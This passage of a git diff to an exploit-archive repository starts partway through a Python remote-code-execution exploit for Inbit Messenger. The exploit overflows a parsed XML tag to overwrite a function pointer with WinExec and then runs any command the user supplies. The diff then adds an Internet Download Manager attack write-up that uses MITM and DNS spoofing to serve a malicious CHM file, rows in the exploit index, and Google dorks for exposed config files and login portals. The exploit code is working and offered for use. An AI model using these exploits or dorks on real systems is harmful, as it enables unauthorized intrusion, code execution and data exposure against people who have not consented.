███████╗██╗ ██╗ + \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ + \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ + \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ + \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ + \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ +\033[0m""" + +# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number +TARGETS = { + 4601 : 0x005f3360, + 4801 : 0x005f7364, + 4901 : 0x005f7364, +} + +# NOTE: min and max values for length of command +CMD_MIN_LEN = 10 +CMD_MAX_LEN = 0xfc64 + +# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow +BAD_BYTES = b"\x3e" # > + +def getWinExecAddress(targetIp:str, targetPort:int) -> bytes: + # NOTE: send packet with client build number of 4601 for v4.6.0 + pkt = b"<50><0>7146011\x00" + logging.info(f"trying to get version information from {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + _d = s.recv(1024) + # find build tag in response + if b'' not in _d: + logging.error(f"invalid version packet received: {_d}") + sys.exit(-1) + s.close() + try: + build = int(_d[_d.index(b'') + 3:_d.index(b'')]) + except: + logging.error(f"failed to parse build number from packet: {_d}") + sys.exit(-1) + # get the IAT offset + if build not in TARGETS.keys(): + logging.error(f"unexpected build number: {build}") + sys.exit(-1) + # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]' + winexec = struct.pack(" None: + # NOTE: command must be NULL terminated + command += b"\x00" + # check user command length + if len(command) < CMD_MIN_LEN: + logging.error(f"command length must be at least {CMD_MIN_LEN} characters") + sys.exit(-1) + if len(command) >= CMD_MAX_LEN: + logging.error(f"command length must be less than {CMD_MAX_LEN} characters") + sys.exit(-1) + # get WinExec address + winexec = getWinExecAddress(targetIp, targetPort) + # get a string representation of the length of the command data after the <> tag parsed by atol() + pktLen = str(len(command)) + pkt = b"<" # start of XML tag/stack overflow + pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character + pkt += b"\x00" # NULL terminator to force atol to ignore what comes next + # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol() + pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite + pkt += winexec # indirect function pointer we control + pkt += b">" # end of XML tag/stack overflow + pkt += command # the command set to the call to WinExec() + logging.info(f"sending payload to {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + s.close() + logging.success("DONE") + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-t', '--target', help='target IP', type=str, required=True) + parser.add_argument('-c', '--command', help='command to run', type=str, required=True) + parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.target, args.port, args.command.encode()) \ No newline at end of file diff --git a/exploits/windows/remote/51131.txt b/exploits/windows/remote/51131.txt new file mode 100644 index 000000000..105ad3d98 --- /dev/null +++ b/exploits/windows/remote/51131.txt @@ -0,0 +1,43 @@ +# Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE) +# Date: 15.11.2022 +# Exploit Author: M. Akil Gündoğan +# Contact: https://twitter.com/akilgundogan +# Vendor Homepage: https://www.internetdownloadmanager.com/ +# Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe +# Version: v.6.41 Build 3 +# Tested on: Windows 10 Professional x64 +# PoC Video: https://youtu.be/0djlanUbfY4 + +Vulnerabiliy Description: +--------------------------------------- +Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension +".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is +done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and +replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading. +This allows the attacker to execute code remotely. + +It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system. + +Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm". + +Requirements: +--------------------------------------- +The attacker and the victim must be on the same local network. +The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges! + +Step by step produce: +--------------------------------------- +1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that. +2 - A MITM attack is made against the target using Ettercap or Bettercap. +3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing. +4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the + same name (tut_tr.chm / the file according to which language you are using.) is placed in it. +5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished. + +Advisories: +--------------------------------------- +Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file +should not be run automatically, additional warning messages should be displayed for users. + +Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends. +--------------------------------------- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d80561a27..b600b9df7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3518,6 +3518,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware,,2011-06-21,2011-07-24,1,OSVDB-73430;CVE-2011-4716,,,,, 18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware,,2011-11-04,2016-12-05,0,CVE-2011-4716;OSVDB-73430,,,,, 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,,2020-03-13,2020-03-13,0,,,,,, +51129,exploits/hardware/remote/51129.txt,"DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure",2023-03-29,"Aryan Chehreghani",remote,hardware,,2023-03-29,2023-03-29,0,,,,,, 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,,2018-08-29,2018-08-29,0,,,,,, 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,,2020-01-08,2020-01-08,0,CVE-2017-3623,,,,, 28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware,,2006-10-31,2013-10-12,1,CVE-2006-5711;OSVDB-30193,,,,,https://www.securityfocus.com/bid/20834/info @@ -4830,6 +4831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,,2020-03-24,2020-03-24,0,CVE-2020-5722,,,,, 29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware,,2013-11-06,2013-11-06,0,OSVDB-99224,,,,, 42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware,,2017-06-11,2017-10-03,0,,,,,, +51130,exploits/hardware/webapps/51130.txt,"Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)",2023-03-29,"Bleron Rrustemi",webapps,hardware,,2023-03-29,2023-03-29,0,,,,,, 30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware,,2013-12-16,2017-11-15,0,CVE-2013-7136;OSVDB-101192,,,,,http://www.planitcomputing.ie/upc-wifi-attack.pdf 24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware,,2013-02-18,2013-02-18,0,OSVDB-90332;OSVDB-90331,,,,,https://www.vulnerability-lab.com/get_content.php?id=873 42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware,,2017-09-18,2017-09-18,0,CVE-2017-14243,,,,, @@ -14801,6 +14803,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2011-08-22,1,,,,,, 5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php,,2008-06-01,2016-12-07,1,OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326,,,,http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz, 12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php,,2010-05-25,,1,,,,,, +51123,exploits/php/webapps/51123.txt,"Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)",2023-03-29,"Rajeshwar Singh",webapps,php,,2023-03-29,2023-03-29,0,,,,,, 46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80,2019-03-04,2019-03-06,0,CVE-2019-9581,"Metasploit Framework (MSF)",,,http://www.exploit-db.combooked-2.7.5.zip, 50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",2021-12-14,0sunday,webapps,php,,2021-12-14,2021-12-14,0,CVE-2019-9581,,,,, 48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,, @@ -19136,6 +19139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php,,2010-09-06,2014-09-10,1,,,,,,https://www.securityfocus.com/bid/43006/info 30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php,,2007-11-02,2014-01-06,1,CVE-2007-5952;OSVDB-38408,,,,,https://www.securityfocus.com/bid/26312/info 30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php,,2007-07-12,2013-12-15,1,CVE-2007-3693;OSVDB-36872,,,,,https://www.securityfocus.com/bid/24880/info +51132,exploits/php/webapps/51132.txt,"Helmet Store Showroom v1.0 - SQL Injection",2023-03-29,"Ameer Hamza",webapps,php,,2023-03-29,2023-03-29,0,,,,,, 26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3639;OSVDB-20861,,,,,https://www.securityfocus.com/bid/15404/info 12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php,,2010-04-26,,1,OSVDB-64103;CVE-2010-1652,,,,, 28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php,,2006-07-31,2013-09-16,1,OSVDB-28285,,,,,https://www.securityfocus.com/bid/19256/info @@ -19347,6 +19351,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,, 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,, +51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,, 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,, 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,, 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,, @@ -28370,6 +28375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17641,,,,, 49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,,2021-01-05,2021-10-28,0,,,,,, 49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,,2021-01-06,2021-10-11,0,,,,,, +51133,exploits/php/webapps/51133.py,"Revenue Collection System v1.0 - Remote Code Execution (RCE)",2023-03-29,"Joe Pollock",webapps,php,,2023-03-29,2023-03-29,0,,,,,, 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip, 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz, @@ -33442,6 +33448,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, +51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,, @@ -40589,6 +40596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows,,2010-11-28,2010-11-28,1,,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-28-at-74353-am.png,http://www.exploit-db.comotsturntablesfreesetup.exe, 11475,exploits/windows/local/11475.py,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows,,2010-02-15,,1,,,,,http://www.exploit-db.comotsturntablesfreesetup.exe, 48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,,2020-05-04,2020-05-04,0,,,,,, +51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,, 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,, @@ -42650,6 +42658,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows,,2007-12-17,,1,CVE-2007-6493;OSVDB-40239,,,,, 30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows,,2007-12-26,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27033/info 37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows,,2015-07-14,2015-07-14,0,OSVDB-124655;OSVDB-124654,,,,, +51127,exploits/windows/remote/51127.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,, +51126,exploits/windows/remote/51126.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,, 8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows,,2009-03-23,,1,,,,,, 3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows,,2007-05-07,,1,OSVDB-34331;CVE-2007-1683,,,,, 28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows,,2013-10-10,2013-10-10,0,OSVDB-98333,,,,, @@ -42677,6 +42687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,,2017-01-02,2017-01-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-165012.png,http://www.exploit-db.comidasetup.exe, 37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows,,2015-07-21,2015-07-21,0,CVE-2014-6332,,,,, 32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows,,2008-10-06,2014-03-24,1,CVE-2008-4508;OSVDB-49030,,,,,https://www.securityfocus.com/bid/31603/info +51131,exploits/windows/remote/51131.txt,"Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)",2023-03-29,"M. Akil Gündoğan",remote,windows,,2023-03-29,2023-03-29,0,,,,,, 19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows,,2000-05-17,2012-07-18,1,CVE-2000-0350;OSVDB-312,,,,,https://www.securityfocus.com/bid/1216/info 23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows,,2004-03-26,2013-01-03,1,,,,,,https://www.securityfocus.com/bid/9913/info 20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows,,2001-06-18,2012-08-30,1,CVE-2001-0788;OSVDB-13973,,,,,https://www.securityfocus.com/bid/2881/info diff --git a/ghdb.xml b/ghdb.xml index e416e2fd1..8e2f00043 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -33946,6 +33946,21 @@ ManhNho 2018-05-29 ManhNho + + 8129 + https://www.exploit-db.com/ghdb/8129 + Files Containing Juicy Info + BroadBand Device Webserver + # Google Dork: BroadBand Device Webserver +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Shx + BroadBand Device Webserver + https://www.google.com/search?q=BroadBand Device Webserver + + 2023-03-29 + Shx + 4740 https://www.exploit-db.com/ghdb/4740 @@ -40414,6 +40429,21 @@ Information about user data is obtained 2021-11-12 Reza Abasi + + 8131 + https://www.exploit-db.com/ghdb/8131 + Files Containing Juicy Info + intitle:"index of "application.yml" + # Google Dork: intitle:"index of "application.yml" +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Suman Das + intitle:"index of "application.yml" + https://www.google.com/search?q=intitle:"index of "application.yml" + + 2023-03-29 + Suman Das + 7959 https://www.exploit-db.com/ghdb/7959 @@ -40429,6 +40459,21 @@ Information about user data is obtained 2022-06-29 Suman Das + + 8128 + https://www.exploit-db.com/ghdb/8128 + Files Containing Juicy Info + intitle:"index of "conf.json" + # Google Dork: intitle:"index of "conf.json" +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Suman Das + intitle:"index of "conf.json" + https://www.google.com/search?q=intitle:"index of "conf.json" + + 2023-03-29 + Suman Das + 7947 https://www.exploit-db.com/ghdb/7947 @@ -47725,6 +47770,21 @@ Author: Abhinav Porwal 2021-10-04 Asif Mohammad Khan + + 8130 + https://www.exploit-db.com/ghdb/8130 + Files Containing Juicy Info + intitle:index of django/admin site:.* + # Google Dork: intitle:index of django/admin site:.* +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Md rofikul + intitle:index of django/admin site:.* + https://www.google.com/search?q=intitle:index of django/admin site:.* + + 2023-03-29 + Md rofikul + 7827 https://www.exploit-db.com/ghdb/7827 @@ -68039,6 +68099,21 @@ Author: Sibi Mathew George 2021-10-25 César Hernández Obispo + + 8125 + https://www.exploit-db.com/ghdb/8125 + Pages Containing Login Portals + allintitle:"MobileIron User Portal: Sign In" + # Google Dork: allintitle:"MobileIron User Portal: Sign In" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"MobileIron User Portal: Sign In" + https://www.google.com/search?q=allintitle:"MobileIron User Portal: Sign In" + + 2023-03-29 + Heverin Hacker + 8092 https://www.exploit-db.com/ghdb/8092 @@ -68054,6 +68129,21 @@ Author: Sibi Mathew George 2023-02-27 GirlsLearnCyber + + 8127 + https://www.exploit-db.com/ghdb/8127 + Pages Containing Login Portals + allintitle:"ResolutionMD Login" + # Google Dork: allintitle:"ResolutionMD Login" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"ResolutionMD Login" + https://www.google.com/search?q=allintitle:"ResolutionMD Login" + + 2023-03-29 + Heverin Hacker + 8095 https://www.exploit-db.com/ghdb/8095 @@ -68069,6 +68159,21 @@ Author: Sibi Mathew George 2023-02-27 GirlsLearnCyber + + 8126 + https://www.exploit-db.com/ghdb/8126 + Pages Containing Login Portals + allintitle:"Synapse Mobility Login" + # Google Dork: allintitle:"Synapse Mobility Login" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"Synapse Mobility Login" + https://www.google.com/search?q=allintitle:"Synapse Mobility Login" + + 2023-03-29 + Heverin Hacker + 8091 https://www.exploit-db.com/ghdb/8091